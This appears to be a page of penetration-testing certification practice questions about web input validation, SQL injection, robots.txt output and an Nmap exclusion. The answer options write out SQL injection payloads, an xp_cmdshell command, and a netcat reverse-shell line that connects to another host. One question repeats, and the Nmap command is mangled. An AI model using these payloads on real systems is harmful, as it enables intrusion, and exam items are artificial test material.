A penetration tester is testing input validation on a search form that was discovered on a website. Which of the following characters is the BEST option to test the website for vulnerabilities?

• A.Comma
• B.Double dash
• C.Single quote
• D.Semicolon

Comment: *

Name: *

Email: *

Verification: *

A penetration tester examines a web-based shopping catalog and discovers the following URL when viewing a product in the catalog:
http://company.com/catalog.asp?productid=22
The penetration tester alters the URL in the browser to the following and notices a delay when the page refreshes:
http://company.com/catalog.asp?productid=22;WAITFOR
DELAY'00:00:05'
Which of the following should the penetration tester attempt NEXT?

• A.http://company.com/catalog.asp?productid=22:EXEC
  xp_cmdshell 'whoami'
• B.http://company.com/catalog.asp?productid=22'
  OR 1=1 --
• C.http://company.com/catalog.asp?productid=22'
  UNION SELECT 1,2,3 --
• D.http://company.com/catalog.asp?productid=22;nc
  192.168.1.22 4444 -e /bin/bash

Comment: *

Name: *

Email: *

Verification: *

Given the following output:
User-agent:*
Disallow: /author/
Disallow: /xmlrpc.php
Disallow: /wp-admin
Disallow: /page/
During which of the following activities was this output MOST likely obtained?

• A.Website scraping
• B.Website cloning
• C.Domain enumeration
• D.URL enumeration

Comment: *

Name: *

Email: *

Verification: *

Given the following Nmap scan command:
[root@kali ~]# nmap 192.168.0 .* -- exclude 192.168.0.101

Which of the following is the total number of servers that Nmap will attempt to scan?

• A.1
• B.101
• C.255
• D.256

Comment: *

Name: *

Email: *

Verification: *

Given the following output:
User-agent:*
Disallow: /author/
Disallow: /xmlrpc.php
Disallow: /wp-admin
Disallow: /page/
During which of the following activities was this output MOST likely obtained?

• A.Website scraping
• B.Website cloning
• C.Domain enumeration
• D.URL enumeration

Comment: *

Name: *

Email: *

Verification: *